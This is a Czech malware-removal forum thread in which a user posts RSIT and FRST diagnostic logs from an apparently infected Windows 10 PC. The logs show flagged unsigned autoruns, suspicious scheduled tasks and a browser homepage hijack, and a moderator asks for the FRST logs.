S2 ekrn;ESET Service; C:\Program Files\ESET\ESET Security\ekrn.exe []
S2 gupdate;Služba Aktualizace Google (gupdate); C:\Program Files\Google\Update\GoogleUpdate.exe [2020-03-19 156104]
S2 Hamachi2Svc;LogMeIn Hamachi Tunneling Engine; C:\Program Files\LogMeIn Hamachi\hamachi-2.exe [2019-04-02 2243528]
S2 LMIGuardianSvc;LMIGuardianSvc; C:\Program Files\LogMeIn Hamachi\LMIGuardianSvc.exe [2016-05-27 405424]
S2 LogiRegistryService;Logitech Gaming Registry Service; C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe [2018-05-07 175240]
S2 MacriumService;Macrium Service; C:\Program Files\Macrium\Common\MacriumService.exe [2020-08-05 5996880]
S2 MapsBroker;@%SystemRoot%\System32\moshost.dll,-100; C:\WINDOWS\System32\svchost.exe [2019-12-07 47232]
S2 MobiGameUpdater;MobiGameUpdater; C:\Program Files\MobiGame\MobiGameUpdater.exe [2020-08-28 256000]
S2 OneSyncSvc;@%SystemRoot%\system32\APHostRes.dll,-10002; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S2 OneSyncSvc_5fd3e;Hostitel synchronizace_5fd3e; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 AarSvc;@%SystemRoot%\system32\AarSvc.dll,-100; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 AarSvc_5fd3e;Agent Activation Runtime_5fd3e; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 AJRouter;@%SystemRoot%\system32\AJRouter.dll,-2; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 AssignedAccessManagerSvc;@%SystemRoot%\system32\assignedaccessmanagersvc.dll,-100; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 autotimesvc;@%SystemRoot%\System32\autotimesvc.dll,-6; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 BcastDVRUserService;@%SystemRoot%\system32\BcastDVRUserService.dll,-100; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 BcastDVRUserService_5fd3e;Uživatelská služba pro GameDVR a vysílání her_5fd3e; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 BluetoothUserService;@%SystemRoot%\system32\Microsoft.Bluetooth.UserService.dll,-101; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 BluetoothUserService_5fd3e;Služba pro podporu uživatelů Bluetooth_5fd3e; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 BTAGService;@%SystemRoot%\system32\BTAGService.dll,-101; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 BthAvctpSvc;@%SystemRoot%\system32\BthAvctpSvc.dll,-101; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 camsvc;@%SystemRoot%\system32\CapabilityAccessManager.dll,-1; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 CaptureService;@%SystemRoot%\system32\CaptureService.dll,-100; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 CaptureService_5fd3e;CaptureService_5fd3e; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 cbdhsvc;@%SystemRoot%\system32\cbdhsvc.dll,-100; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 ClipSVC;@%SystemRoot%\system32\ClipSVC.dll,-103; C:\WINDOWS\System32\svchost.exe [2019-12-07 47232]
S3 ConsentUxUserSvc;@%SystemRoot%\system32\ConsentUxClient.dll,-100; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 ConsentUxUserSvc_5fd3e;ConsentUX_5fd3e; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 CredentialEnrollmentManagerUserSvc;@%SystemRoot%\system32\CredentialEnrollmentManager.exe,-100; C:\WINDOWS\system32\CredentialEnrollmentManager.exe [2020-09-03 287648]
S3 CredentialEnrollmentManagerUserSvc_5fd3e;CredentialEnrollmentManagerUserSvc_5fd3e; C:\WINDOWS\system32\CredentialEnrollmentManager.exe [2020-09-03 287648]
S3 DeviceAssociationBrokerSvc;@%SystemRoot%\system32\deviceaccess.dll,-107; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 DeviceAssociationBrokerSvc_5fd3e;DeviceAssociationBroker_5fd3e; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 DevicePickerUserSvc;@%SystemRoot%\system32\Windows.Devices.Picker.dll,-1006; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 DevicePickerUserSvc_5fd3e;DevicePicker_5fd3e; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 DevicesFlowUserSvc;@%SystemRoot%\system32\DevicesFlowBroker.dll,-103; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 DevicesFlowUserSvc_5fd3e;Tok zařízení_5fd3e; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 DevQueryBroker;@%SystemRoot%\system32\DevQueryBroker.dll,-100; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 diagnosticshub.standardcollector.service;@%SystemRoot%\system32\DiagSvcs\DiagnosticsHub.StandardCollector.ServiceRes.dll,-1000; C:\WINDOWS\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe [2020-09-03 71680]
S3 diagsvc;@%systemroot%\system32\DiagSvc.dll,-100; C:\WINDOWS\System32\svchost.exe [2019-12-07 47232]
S3 Disc Soft Lite Bus Service;Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe [2020-03-19 4069992]
S3 DisplayEnhancementService;@%SystemRoot%\System32\Microsoft.Graphics.Display.DisplayEnhancementService.dll,-1000; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 DmEnrollmentSvc;@%systemroot%\system32\Windows.Internal.Management.dll,-100; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 dmwappushservice;@%SystemRoot%\system32\dmwappushsvc.dll,-200; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 DsSvc;@%SystemRoot%\system32\dssvc.dll,-10003; C:\WINDOWS\System32\svchost.exe [2019-12-07 47232]
S3 EasyAntiCheat;EasyAntiCheat; C:\Program Files\EasyAntiCheat\EasyAntiCheat.exe [2020-10-11 802432]
S3 edgeupdatem;Služba Microsoft Edge Update (edgeupdatem); C:\Program Files\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe [2020-06-13 224160]
S3 embeddedmode;@%SystemRoot%\system32\embeddedmodesvc.dll,-201; C:\WINDOWS\System32\svchost.exe [2019-12-07 47232]
S3 EntAppSvc;@EnterpriseAppMgmtSvc.dll,-1; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 FrameServer;@%systemroot%\system32\FrameServer.dll,-100; C:\WINDOWS\System32\svchost.exe [2019-12-07 47232]
S3 GoogleChromeElevationService;Google Chrome Elevation Service; C:\Program Files\Google\Chrome\Application\86.0.4240.75\elevation_service.exe [2020-10-05 1123312]
S3 GraphicsPerfSvc;@%SystemRoot%\system32\GraphicsPerfSvc.dll,-100; C:\WINDOWS\System32\svchost.exe [2019-12-07 47232]
S3 gupdatem;Služba Aktualizace Google (gupdatem); C:\Program Files\Google\Update\GoogleUpdate.exe [2020-03-19 156104]
S3 icssvc;@%SystemRoot%\System32\tetheringservice.dll,-4097; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 InstallService;@%SystemRoot%\system32\InstallService.dll,-200; C:\WINDOWS\System32\svchost.exe [2019-12-07 47232]
S3 IpxlatCfgSvc;@%Systemroot%\system32\ipxlatcfg.dll,-500; C:\WINDOWS\System32\svchost.exe [2019-12-07 47232]
S3 LicenseManager;@%SystemRoot%\system32\licensemanagersvc.dll,-200; C:\WINDOWS\System32\svchost.exe [2019-12-07 47232]
S3 LxpSvc;@%SystemRoot%\system32\LanguageOverlayServer.dll,-100; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 MessagingService;@%SystemRoot%\system32\MessagingService.dll,-100; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 MessagingService_5fd3e;Služba zasílání zpráv_5fd3e; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 MicrosoftEdgeElevationService;Microsoft Edge Elevation Service; C:\Program Files\Microsoft\Edge\Application\86.0.622.43\elevation_service.exe [2020-10-14 1360272]
S3 NaturalAuthentication;@%systemroot%\system32\NaturalAuth.dll,-100; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 NetSetupSvc;@%SystemRoot%\system32\NetSetupSvc.dll,-3; C:\WINDOWS\System32\svchost.exe [2019-12-07 47232]
S3 ose;Office Source Engine; C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2015-07-31 202928]
S3 perceptionsimulation;@%systemroot%\system32\PerceptionSimulation\PerceptionSimulationService.exe,-101; C:\WINDOWS\system32\PerceptionSimulation\PerceptionSimulationService.exe [2019-12-07 80384]
S3 PhoneSvc;@%SystemRoot%\system32\PhoneserviceRes.dll,-10000; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 PimIndexMaintenanceSvc;@%SystemRoot%\system32\UserDataAccessRes.dll,-15001; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 PimIndexMaintenanceSvc_5fd3e;Data kontaktů_5fd3e; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 PrintWorkflowUserSvc;@%SystemRoot%\system32\PrintWorkflowService.dll,-100; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 PrintWorkflowUserSvc_5fd3e;PrintWorkflow_5fd3e; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 PushToInstall;@%SystemRoot%\system32\pushtoinstall.dll,-200; C:\WINDOWS\System32\svchost.exe [2019-12-07 47232]
S3 RetailDemo;@%SystemRoot%\System32\RDXService.dll,-256; C:\WINDOWS\System32\svchost.exe [2019-12-07 47232]
S3 RmSvc;@%SystemRoot%\system32\RMapi.dll,-1001; C:\WINDOWS\System32\svchost.exe [2019-12-07 47232]
S3 SecurityHealthService;@%systemroot%\system32\SecurityHealthAgent.dll,-1002; C:\WINDOWS\system32\SecurityHealthService.exe [2020-09-03 790232]
S3 SEMgrSvc;@%SystemRoot%\System32\SEMgrSvc.dll,-1001; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 Sense;@%ProgramFiles%\Windows Defender Advanced Threat Protection\MsSense.exe,-1001; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [2020-09-03 3918680]
S3 SensorDataService;@%SystemRoot%\system32\SensorDataService.exe,-101; C:\WINDOWS\System32\SensorDataService.exe [2019-12-07 870912]
S3 SensorService;@%SystemRoot%\System32\sensorservice.dll,-1000; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 SharedRealitySvc;@%SystemRoot%\system32\SharedRealitySvc.dll,-100; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 SmsRouter;@%SystemRoot%\System32\SmsRouterSvc.dll,-10001; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 spectrum;@%systemroot%\system32\spectrum.exe,-101; C:\WINDOWS\system32\spectrum.exe [2019-12-07 626688]
S3 Steam Client Service;Steam Client Service; C:\Program Files\Common Files\Steam\SteamService.exe [2020-10-20 1876256]
S4 AppVClient;@%systemroot%\system32\AppVClient.exe,-102; C:\WINDOWS\system32\AppVClient.exe [2019-12-07 622624]
S4 shpamsvc;@%SystemRoot%\System32\Windows.SharedPC.AccountManager.dll,-100; C:\WINDOWS\System32\svchost.exe [2019-12-07 47232]
S4 ssh-agent;OpenSSH Authentication Agent; C:\WINDOWS\System32\OpenSSH\ssh-agent.exe [2019-04-18 323584]
-----------------EOF-----------------
Odvirování PC, zrychlení počítače, vzdálená pomoc prostřednictvím služby neslape.cz
prosím o kontrolu logu rsit
Moderátor: Moderátoři
Pravidla fóra
Pokud chcete pomoc, vložte log z FRST [návod zde] nebo RSIT [návod zde]
Jednotlivé thready budou po vyřešení uzamčeny. Stejně tak ty, které budou nečinné déle než 14 dní. Vizte Pravidlo o zamykání témat. Děkujeme za pochopení.
!NOVINKA!
Nově lze využívat služby vzdálené pomoci, kdy se k vašemu počítači připojí odborník a bližší informace o problému si od vás získá telefonicky! Více na www.neslape.cz
Pokud chcete pomoc, vložte log z FRST [návod zde] nebo RSIT [návod zde]
Jednotlivé thready budou po vyřešení uzamčeny. Stejně tak ty, které budou nečinné déle než 14 dní. Vizte Pravidlo o zamykání témat. Děkujeme za pochopení.
!NOVINKA!
Nově lze využívat služby vzdálené pomoci, kdy se k vašemu počítači připojí odborník a bližší informace o problému si od vás získá telefonicky! Více na www.neslape.cz
-
Rudy
- Site Admin
- Příspěvky: 119418
- Registrován: 30 říj 2003 13:42
- Bydliště: Plzeň
- Kontaktovat uživatele:
Re: prosím o kontrolu logu rsit
Zdravím!
RSIT není s desítkami plně kompatibilní. Dejte logy FRST+Addition: https://forum.viry.cz/viewtopic.php?f=13&t=154679 .
RSIT není s desítkami plně kompatibilní. Dejte logy FRST+Addition: https://forum.viry.cz/viewtopic.php?f=13&t=154679 .
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Re: prosím o kontrolu logu rsit
Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 19-10-2020
Ran by 42072 (administrator) on DESKTOP-4NQUTUE (20-10-2020 22:08:19)
Running from C:\Users\42072\Desktop
Loaded Profiles: 42072
Platform: Microsoft Windows 10 Pro Version 2004 19041.450 (X86) Language: Čeština (Česko)
Default browser: Edge
Boot Mode: Safe Mode (minimal)
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/33 ... scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(AVB Disc Soft, SIA -> Disc Soft Ltd) C:\Program Files\DAEMON Tools Lite\DTShellHlp.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\HelpPane.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <2>
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\oobe\UserOOBEBroker.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2009.7-0\MsMpEng.exe
==================== Registry (Whitelisted) ===================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [StartCCC] => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\x86\CLIStart.exe [748744 2015-11-04] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
HKLM\...\Run: [LogMeIn Hamachi Ui] => C:\Program Files\LogMeIn Hamachi\hamachi-2-ui.exe [5890504 2019-04-02] (LogMeIn, Inc. -> LogMeIn Inc.)
HKLM\...\Run: [seznam-listicka-distribuce] => C:\Program Files\Seznam.cz\distribution\szninstall.exe [1069296 2018-03-27] (Seznam.cz, a.s. -> )
HKLM\...\Run: [LogiOptions] => C:\Program Files\Logitech\LogiOptions\LogiOptions.exe [1718408 2020-04-27] (Logitech Inc -> Logitech, Inc.)
HKLM\...\Run: [Reflect UI] => C:\Program Files\Macrium\Common\ReflectUI.exe [6131976 2020-08-05] (Paramount Software UK Ltd -> Paramount Software UK Ltd)
HKLM\...\Run: [DiskFixer] => C:\Program Files\DiskFixer\DiskFixer.exe [247808 2019-07-04] () [File not signed] <==== ATTENTION
HKLM\...\Run: [Launch LCore] => C:\Program Files\Logitech Gaming Software\LCore.exe [13868168 2018-05-07] (Logitech Inc -> Logitech Inc.)
HKLM\...\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [710264 2020-06-18] (Oracle America, Inc. -> Oracle Corporation)
HKU\S-1-5-19\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [516608 2019-12-07] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-20\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [516608 2019-12-07] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Run: [DAEMON Tools Lite Automount] => C:\Program Files\DAEMON Tools Lite\DTAgent.exe [365672 2020-03-19] (AVB Disc Soft, SIA -> Disc Soft Ltd)
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Run: [EpicGamesLauncher] => C:\Program Files\Epic Games\Launcher\Portal\Binaries\Win32\EpicGamesLauncher.exe [26028432 2020-07-03] (Epic Games Inc. -> Epic Games, Inc.)
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Run: [Spotify] => C:\Users\42072\AppData\Roaming\Spotify\Spotify.exe [23220456 2020-07-05] (Spotify AB -> Spotify Ltd)
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Run: [Mobigame Playstore] => C:\Program Files\MobiGame\playstore\playstore.exe [135680 2020-08-28] () [File not signed]
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Run: [MuddyGlade] => C:\WINDOWS\rss\csrss.exe [4080640 2020-09-27] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Run: [Web Companion] => C:\Program Files\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Run: [rfxgnkvq] => "C:\Users\42072\izhfpkrf.exe"
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Run: [CloudNet] => C:\Users\42072\AppData\Roaming\16f618eaf6a0\16f618eaf6a0.exe [549376 2020-10-20] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Run: [Steam] => C:\Program Files\Steam\steam.exe [3416352 2020-10-15] (Valve -> Valve Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\86.0.4240.75\Installer\chrmstp.exe [2020-10-09] (Google LLC -> Google LLC)
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
==================== Scheduled Tasks (Whitelisted) ============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {0204B8D3-DE41-47BC-908C-4991B4B01C81} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2009.7-0\MpCmdRun.exe [460640 2020-10-10] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {035C66D3-3267-4413-8AA1-62DEE2FE48E5} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [156104 2020-03-19] (Google LLC -> Google LLC)
Task: {18F6FB00-BC5E-40F2-B942-28C444FA801F} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [314544 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {204ECE63-4E6A-4770-A8E1-979A2508CEBF} - System32\Tasks\NvNgxUpdateCheckDaily_{2A68F03E-F03E-F03E-F03E-2A68F03EF03E} => C:\Users\42072\AppData\Roaming\fweigsc.exe <==== ATTENTION
Task: {431477B5-ED35-4340-8CAA-B6BB67524844} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe [124632 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {64A8F9E3-A3B3-4C83-BBEB-DBC19AC5FE37} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2009.7-0\MpCmdRun.exe [460640 2020-10-10] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {6AB4A925-F182-4226-B65D-EF244AAA012C} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [600784 2020-10-13] (Mozilla Corporation -> Mozilla Foundation)
Task: {786FA461-0DED-4BF7-9479-9BAA2E1587AC} - System32\Tasks\NvNgxUpdateCheckDaily_{A6B397E0-97E0-97E0-97E0-A6B397E097E0} => C:\Users\42072\AppData\Roaming\jgeigsc.exe <==== ATTENTION
Task: {847F1E03-98FC-4129-AA18-E7CDB55634DD} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [314544 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {9D1BEBE2-2DD4-4A25-A32C-B86C65CCDEAA} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2009.7-0\MpCmdRun.exe [460640 2020-10-10] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {AD86ADA3-1803-4D49-9974-AC4B675E2828} - System32\Tasks\csrss => C:\WINDOWS\rss\csrss.exe [4080640 2020-09-27] () [File not signed] <==== ATTENTION
Task: {C22B2574-9B3A-4D68-868F-AE2834A8D1E1} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2009.7-0\MpCmdRun.exe [460640 2020-10-10] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {C4E5A3FD-EB6B-4D00-8FAD-EF74A2B6DC50} - System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(1): schtasks.exe -> /Change /TN "\MicrosoftEdgeUpdateTaskMachineCore" /ENABLE
Task: {C4E5A3FD-EB6B-4D00-8FAD-EF74A2B6DC50} - System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(2): schtasks.exe -> /Change /TN "\MicrosoftEdgeUpdateTaskMachineUA" /ENABLE
Task: {C4E5A3FD-EB6B-4D00-8FAD-EF74A2B6DC50} - System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(3): schtasks.exe -> /Change /TN "\AVAST Software\Gaming mode Task Scheduler recovery" /DISABLE
Task: {D5436AFF-CA8D-4256-81CB-5800BB0CDA01} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [156104 2020-03-19] (Google LLC -> Google LLC)
Task: {FFB214BF-B5AF-4129-AFD4-D5FE103A286B} - System32\Tasks\Time Trigger Task => C:\Users\42072\AppData\Local\9ed9efac-d91e-4bae-b8a6-b37bff330bfb\7DCE.exe <==== ATTENTION
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Tcpip\Parameters: [DhcpNameServer] 84.16.96.225 84.16.96.2
Tcpip\..\Interfaces\{345663bd-b4f0-4a3c-9b78-46e31c76d760}: [DhcpNameServer] 84.16.96.225 84.16.96.2
Edge:
======
Edge DefaultProfile: Default
Edge Profile: C:\Users\42072\AppData\Local\Microsoft\Edge\User Data\Default [2020-10-20]
FireFox:
========
FF DefaultProfile: 5tautenb.default
FF ProfilePath: C:\Users\42072\AppData\Roaming\Mozilla\Firefox\Profiles\5tautenb.default [2020-09-11]
FF NewTab: Mozilla\Firefox\Profiles\5tautenb.default -> hxxps://securesearch.org/homepage?hp=2&pId=BC180101&iDate=2020-09-11 04:31:44&bName=
FF ProfilePath: C:\Users\42072\AppData\Roaming\Mozilla\Firefox\Profiles\h2n5v0bu.default-release-1570206046342 [2020-10-20]
FF Homepage: Mozilla\Firefox\Profiles\h2n5v0bu.default-release-1570206046342 -> hxxps://securesearch.org/homepage?hp=2&pId=BC180101&iDate=2020-09-11 04:31:44&bName=
FF NewTab: Mozilla\Firefox\Profiles\h2n5v0bu.default-release-1570206046342 -> hxxps://securesearch.org/homepage?hp=2&pId=BC180101&iDate=2020-09-11 04:31:44&bName=
FF Notifications: Mozilla\Firefox\Profiles\h2n5v0bu.default-release-1570206046342 -> hxxps://mail.google.com; hxxps://uhta.getedicta.info
FF Extension: (Greasemonkey) - C:\Users\42072\AppData\Roaming\Mozilla\Firefox\Profiles\h2n5v0bu.default-release-1570206046342\Extensions\{e4a8a97b-f2ed-450b-b12d-ee082ba24781}.xpi [2020-10-09]
FF Plugin: @java.com/DTPlugin,version=11.261.2 -> C:\Program Files\Java\jre1.8.0_261\bin\dtplugin\npDeployJava1.dll [2020-10-10] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.261.2 -> C:\Program Files\Java\jre1.8.0_261\bin\plugin2\npjp2.dll [2020-10-10] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~1\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default [2020-10-20]
CHR Extension: (Prezentace) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2020-03-19]
CHR Extension: (Dokumenty) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2020-03-19]
CHR Extension: (Disk Google) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-03-19]
CHR Extension: (Seznam doplněk - Email) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\bgjpfhpjcgdppjbgnpnjllokbmcdllig [2020-09-12]
CHR Extension: (YouTube) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2020-03-19]
CHR Extension: (Tabulky) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2020-03-19]
CHR Extension: (d8yI+Hf7rX) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\fhiginakogfjlgjcgmcnahlmfllhicoe [2020-09-11]
CHR Extension: (Dokumenty Google offline) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-09-12]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2020-03-19]
CHR Extension: (Seznam doplněk - Esko) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\olfeabkoenfaoljndfecamgilllcpiak [2020-09-12]
CHR Extension: (Gmail) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-03-19]
CHR Extension: (Chrome Media Router) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-10-10]
CHR Profile: C:\Users\42072\AppData\Local\Google\Chrome\User Data\Guest Profile [2020-10-10]
CHR Profile: C:\Users\42072\AppData\Local\Google\Chrome\User Data\System Profile [2020-10-10]
CHR HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bgjpfhpjcgdppjbgnpnjllokbmcdllig]
CHR HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [olfeabkoenfaoljndfecamgilllcpiak]
Opera:
=======
OPR Extension: (book_helper) - C:\Users\42072\AppData\Roaming\Opera Software\Opera Stable\Extensions\fhiginakogfjlgjcgmcnahlmfllhicoe [2020-09-11]
==================== Services (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S2 AegLauncher; C:\Program Files\MobiGame\aeg_launcher.exe [6312448 2020-08-28] () [File not signed]
